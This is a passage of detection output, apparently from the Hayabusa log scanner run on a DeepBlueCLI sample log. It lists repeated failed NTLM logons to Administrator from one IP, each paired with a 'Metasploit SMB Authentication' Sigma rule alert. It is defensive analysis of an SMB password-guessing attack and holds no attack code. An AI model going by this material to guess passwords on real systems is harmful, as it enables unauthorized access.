Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 